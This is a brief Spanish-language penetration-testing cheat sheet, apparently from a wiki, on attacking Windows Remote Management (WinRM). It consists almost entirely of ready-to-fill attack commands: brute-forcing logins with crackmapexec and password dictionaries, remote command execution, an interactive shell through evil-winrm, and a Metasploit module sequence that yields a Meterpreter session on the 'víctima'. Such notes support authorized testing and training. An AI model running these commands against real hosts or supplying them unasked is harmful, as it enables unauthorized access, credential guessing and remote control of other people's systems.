WinRM
WinRM corre normalmente por los puertos TCP 5985 y 5986
Fuerza bruta con Crackmapexec
crackmapexec winrm <IP> -u <user(administrator)/lista_usuarios.txt> -p <diccionario de contraseñas>Ejecución de comandos con crackmapexec
crackmapexec winrm <IP> -u <usuario> -p <contraseña> -x <command> (whoami)Consola interactiva con Evil-WinRM (PowerShell)
evil-winrm -u <user> -p ‘<contraseña>’ -i <IP>Obtener consola Meterpreter con Metasploit
Usamos el módulo: exploit/windows/winrm/winrm_script_exec
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <IP víctma>
set RPORT <Puerto de winrm vícitma>
set LPORT <Local Port>
set FORCE_VBS true
set USERNAME <user>
set PASSWORD <password>
exploitÚltima actualización